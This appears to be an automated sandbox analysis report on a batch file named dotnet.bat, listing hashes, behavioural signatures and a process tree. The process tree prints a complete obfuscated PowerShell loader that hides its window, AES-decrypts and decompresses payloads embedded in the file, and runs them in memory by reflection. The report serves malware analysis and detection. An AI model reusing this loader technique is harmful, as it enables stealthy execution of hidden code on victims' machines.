Analysis
-
max time kernel
34s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
27-06-2024 22:08
Static task
static1
Behavioral task
behavioral1
Sample
dotnet.bat
Resource
win7-20240611-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
dotnet.bat
Resource
win10v2004-20240611-en
9 signatures
150 seconds
General
-
Target
dotnet.bat
-
Size
62KB
-
MD5
3dfb1c3ff09dc31a4096b821b9ff204b
-
SHA1
8604c300175bf352b7612412c6521064a2514674
-
SHA256
a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b
-
SHA512
895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172
-
SSDEEP
1536:nOTyT0nIr49koWVZVCud2f7vXJiEOlVnpw0APKNjO4mdFqQjHQp+XuHdd:OmTGZ0aPIEapexSNjO4mdFqQjHQp+Xun
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1396 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1396 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2196 wrote to memory of 1460 2196 cmd.exe cmd.exe PID 2196 wrote to memory of 1460 2196 cmd.exe cmd.exe PID 2196 wrote to memory of 1460 2196 cmd.exe cmd.exe PID 1460 wrote to memory of 1252 1460 cmd.exe cmd.exe PID 1460 wrote to memory of 1252 1460 cmd.exe cmd.exe PID 1460 wrote to memory of 1252 1460 cmd.exe cmd.exe PID 1460 wrote to memory of 1396 1460 cmd.exe powershell.exe PID 1460 wrote to memory of 1396 1460 cmd.exe powershell.exe PID 1460 wrote to memory of 1396 1460 cmd.exe powershell.exe PID 1460 wrote to memory of 1396 1460 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "3⤵PID:1252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396